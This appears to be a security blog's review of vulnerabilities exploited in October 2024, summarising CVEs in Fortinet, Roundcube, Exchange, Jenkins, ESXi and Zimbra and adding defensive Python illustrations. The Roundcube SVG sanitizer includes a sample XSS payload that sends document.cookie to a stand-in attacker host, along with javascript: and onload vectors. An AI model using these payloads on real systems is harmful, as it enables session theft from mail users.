
Welcome to TheCyberThrone's most exploited vulnerabilities review. This review covers the month of October 2024.
CVE-2024-21762: Fortinet FortiOS: Out-of-bounds Write
CVSS 3.1 score : 9.8 CISA KEV : Yes
An out-of-bounds write in Fortinet FortiOS versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.6, 7.0.0 through 7.0.13, 6.4.0 through 6.4.14, 6.2.0 through 6.2.15, 6.0.0 through 6.0.17, and FortiProxy versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.8, 7.0.0 through 7.0.14, 2.0.0 through 2.0.13, 1.2.0 through 1.2.13, 1.1.0 through 1.1.6, 1.0.0 through 1.0.7 allows an attacker to execute unauthorized code or commands via specifically crafted requests.
CVE-2023-27997: Fortinet FortiOS: Out-of-bounds Write
CVSS 3.1 score : 9.8 CISA KEV : Yes
A heap-based buffer overflow vulnerability [CWE-122] in the SSL-VPN component of FortiOS version 7.2.4 and below, version 7.0.11 and below, version 6.4.12 and below, version 6.0.16 and below, and of FortiProxy version 7.2.3 and below, version 7.0.9 and below, version 2.0.12 and below, version 1.2 (all versions) and version 1.1 (all versions) may allow a remote attacker to execute arbitrary code or commands via specifically crafted requests.
CVE-2024-23113: Fortinet FortiOS: Use of Externally-Controlled Format String
CVSS 3.1 score : 9.8 CISA KEV : Yes
A use of an externally-controlled format string in Fortinet FortiOS versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.6, 7.0.0 through 7.0.13, FortiProxy versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.8, 7.0.0 through 7.0.14, FortiPAM versions 1.2.0, 1.1.0 through 1.1.2, 1.0.0 through 1.0.3, and FortiSwitchManager versions 7.2.0 through 7.2.3, 7.0.0 through 7.0.3 allows an attacker to execute unauthorized code or commands via specially crafted packets. Because the format string is attacker-controlled, a single crafted packet is enough to reach the flaw, and successful exploitation gives the attacker code execution on the affected device. Users are advised to update their systems as soon as possible to mitigate this risk.
CVE-2023-5631: Roundcube Improper Neutralization XSS
CVSS 3.1 score : 5.4 CISA KEV : Yes
A stored XSS vulnerability affecting Roundcube email client versions before 1.4.15, 1.5.x before 1.5.5, and 1.6.x before 1.6.4. An attacker can exploit this flaw by sending an HTML email containing a crafted SVG document. The vulnerable component, program/lib/Roundcube/rcube_washtml.php, fails to properly sanitize the SVG, allowing the attacker's JavaScript to run in the victim's browser when the victim views the email. This could potentially lead to account takeover, data theft, or further exploitation.
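To make the SVG vector concrete, the following is an added example (not Roundcube's rcube_washtml code, and not written by the project) of a minimal washer for an SVG embedded in HTML mail. It strips the things a crafted SVG uses to run script: script-bearing elements, on* event handlers, and javascript:/data: URLs. The sample SVG, the attacker.invalid host and the denylists are all constructed for the illustration.

```python
"""Minimal SVG washer illustrating the vectors behind CVE-2023-5631 (added example).

This is a stand-alone Python model, not Roundcube's rcube_washtml.php. It shows
what must be removed from an SVG before an HTML mail is rendered inside the
user's authenticated webmail session.
"""
import xml.etree.ElementTree as ET
from typing import List, Tuple

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
ET.register_namespace("", SVG_NS)          # serialise <svg> without an ns0: prefix
ET.register_namespace("xlink", XLINK_NS)

# Elements that can execute script or embed a foreign (XHTML) document.
DROP_ELEMENTS = {"script", "foreignObject", "set", "animate", "animateTransform"}
# Attributes that take a URL and may therefore carry a javascript: or data: scheme
# (data: can smuggle a second SVG/HTML document through <use> or <image>).
URL_ATTRIBUTES = {"href", "src", "from", "to", "values"}

# Constructed malicious SVG: three distinct script vectors plus one harmless shape.
SAMPLE_SVG = (
    '<svg xmlns="http://www.w3.org/2000/svg" '
    'xmlns:xlink="http://www.w3.org/1999/xlink" onload="alert(1)">'
    '<script>fetch("https://attacker.invalid/?c=" + document.cookie)</script>'
    '<a xlink:href="javascript:alert(2)"><text x="10" y="20">click me</text></a>'
    '<foreignObject><body xmlns="http://www.w3.org/1999/xhtml" onmouseover="alert(3)"/></foreignObject>'
    '<circle cx="5" cy="5" r="3" fill="red"/>'
    '</svg>'
)


def _local(qname: str) -> str:
    """Strip the '{namespace}' prefix ElementTree puts on tags and attributes."""
    return qname.rsplit("}", 1)[-1]


def sanitize_svg(svg_text: str) -> Tuple[str, List[str]]:
    """Return (washed SVG, list of removed items).

    Denylist approach for illustration only: anything not recognised is kept.
    A production washer should allowlist known-safe elements and attributes.
    """
    root = ET.fromstring(svg_text)
    if _local(root.tag) != "svg":
        raise ValueError("not an SVG document")
    removed: List[str] = []

    def wash(elem: ET.Element) -> None:
        # 1. attributes: every on* handler, and URL attributes with a scripting scheme
        for attr in list(elem.attrib):
            name = _local(attr).lower()
            value = elem.attrib[attr].strip().lower()
            if name.startswith("on"):
                removed.append(f"attribute {name}")
                del elem.attrib[attr]
            elif name in URL_ATTRIBUTES and value.startswith(("javascript:", "data:")):
                removed.append(f"attribute {name}={value}")
                del elem.attrib[attr]
        # 2. children: drop script-capable elements outright, recurse into the rest
        for child in list(elem):
            if _local(child.tag) in DROP_ELEMENTS:
                removed.append(f"element {_local(child.tag)}")
                elem.remove(child)
            else:
                wash(child)

    wash(root)
    return ET.tostring(root, encoding="unicode"), removed


if __name__ == "__main__":
    clean, dropped = sanitize_svg(SAMPLE_SVG)
    print("removed:", dropped)
    print("washed :", clean)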
CVE-2023-43770 : Roundcube Webmail Vulnerability
CVSS 3.1 score : 6.1 CISA KEV : Yes
A vulnerability affecting Roundcube webmail versions before 1.4.14, 1.5.x before 1.5.4, and 1.6.x before 1.6.3. This issue allows Cross-Site Scripting (XSS) attacks through text/plain e-mail messages containing specially crafted links. The vulnerability lies in the behavior of Roundcube's string replacer, located in program/lib/Roundcube/rcube_string_replacer.php, which fails to properly sanitize the link text it turns into HTML. Successful exploitation could result in the execution of malicious scripts within the webmail interface. Users are advised to update to the latest version as soon as possible to address this security risk.
CVE-2024-26198: Microsoft Exchange Server Remote Code Execution Vulnerability
CVSS 3.1 score : 8.8 CISA KEV : No
A remote code execution vulnerability affecting Microsoft Exchange Server. An attacker can exploit this flaw by sending specially crafted emails to targets, potentially gaining control over the affected system. Successful exploitation could allow the attacker to install programs; view, change, or delete data; and create new accounts with full user rights. Organizations running Microsoft Exchange Server are advised to apply the available patches as soon as possible to mitigate this risk.
CVE-2024-23897: Jenkins Arbitrary file read vulnerability
CVSS 3.1 score : 9.8 CISA KEV : Yes
A vulnerability affecting Jenkins 2.441 and earlier, as well as LTS 2.426.2 and earlier. The issue lies in Jenkins' CLI command parser (the args4j library), which did not disable a feature that interprets '@' followed by a file path in an argument as an instruction to replace that argument with the file's contents. As a result, attackers can read arbitrary files on the Jenkins controller file system: according to the Jenkins advisory, attackers with Overall/Read permission can read entire files, while unauthenticated attackers can read at least the first few lines of a file through the contents echoed back in error messages. This can lead to exposure of sensitive information such as credentials and secrets. Jenkins users are advised to upgrade to a patched version as soon as possible to mitigate this risk.
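The following is an added example, not Jenkins' or args4j's code, that models the '@file' expansion in plain Python so the mechanism can be seen end to end: the vulnerable parser swaps the argument for the file's tokens and the first token lands in an error message, while the hardened parser treats '@/path' as a literal string. The secret file, the error-message format and the function names are constructed for the illustration.

```python
"""Toy model of the '@file' argument expansion behind CVE-2024-23897 (added example).

Jenkins' CLI used the args4j library, which by default replaces an argument of
the form '@/path' with the whitespace-separated contents of that file. The
expansion is modelled here in plain Python; this is not Jenkins' or args4j's code.
"""
import os
import tempfile
from typing import List, Tuple


def expand_args(argv: List[str], expand_at_files: bool = True) -> List[str]:
    """Return argv with '@file' arguments expanded when expand_at_files is True.

    expand_at_files=True models the pre-fix parser. False models the fix shipped
    in Jenkins 2.442 / LTS 2.426.3, where the feature is disabled and '@/etc/passwd'
    stays a literal argument.
    """
    expanded: List[str] = []
    for arg in argv:
        if expand_at_files and arg.startswith("@") and len(arg) > 1:
            with open(arg[1:], "r", encoding="utf-8") as fh:
                # the file is split on whitespace into separate arguments
                expanded.extend(fh.read().split())
        else:
            expanded.append(arg)
    return expanded


def run_cli_command(argv: List[str], expand_at_files: bool = True) -> str:
    """Simulate a CLI command that echoes an unknown job name in its error.

    Whatever token lands in the job-name position is reflected back to the
    caller, which is how file contents leak even to an unauthenticated user.
    """
    args = expand_args(argv, expand_at_files)
    job = args[1] if len(args) > 1 else ""
    return f"ERROR: No such job '{job}'"


def demo() -> Tuple[str, str]:
    """Write a constructed secret file and return (vulnerable, hardened) responses."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
        fh.write("s3cr3t-admin-token\nsecond line of the secret\n")
        path = fh.name
    try:
        vulnerable = run_cli_command(["help", "@" + path], expand_at_files=True)
        hardened = run_cli_command(["help", "@" + path], expand_at_files=False)
    finally:
        os.unlink(path)
    return vulnerable, hardened


if __name__ == "__main__":
    for label, message in zip(("vulnerable", "hardened"), demo()):
        print(f"{label}: {message}")
```

The toy only reflects the first token; which lines a real command echoed back depended on the command, which is why the advisory distinguishes between reading the first few lines and reading whole files. The fix is the boolean, not extra escaping: the safe change is to stop expanding '@' arguments at all.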
CVE-2024-37085: VMware ESXi Active Directory Integration Authentication Bypass
CVSS 3.1 score : 7.2 CISA KEV : Yes
A vulnerability affecting VMware ESXi, a popular hypervisor for enterprise environments. The issue allows an attacker with sufficient Active Directory (AD) permissions to bypass authentication and gain unauthorized full access to an ESXi host. By recreating the configured AD group, ‘ESXi Admins’ by default, an attacker can exploit this vulnerability despite the group being deleted from AD.
CVE-2024-45519: Synacor Zimbra Collaboration Command Execution Vulnerability
CVSS 3.1 score : 10 CISA KEV : Yes
The postjournal service in Zimbra Collaboration (ZCS) before 8.8.15 Patch 46, 9 before 9.0.0 Patch 41, 10 before 10.0.9, and 10.1 before 10.1.1 sometimes allows unauthenticated users to execute commands.
CVE-2023-21529: Microsoft Exchange Server Remote Code Execution Vulnerability
CVSS 3.1 score : 8.8 CISA KEV : No
A high-severity vulnerability in Microsoft Exchange Server that enables remote code execution (RCE). It affects multiple versions of Microsoft Exchange Server, including 2013, 2016, and 2019. The flaw arises from improper handling of deserialization of untrusted data, which a malicious actor could exploit to run code on the server.
This brings this review's security coverage to an end. Thanks for visiting TheCyberThrone. If you like us, please follow us on Facebook, Twitter, and Instagram.


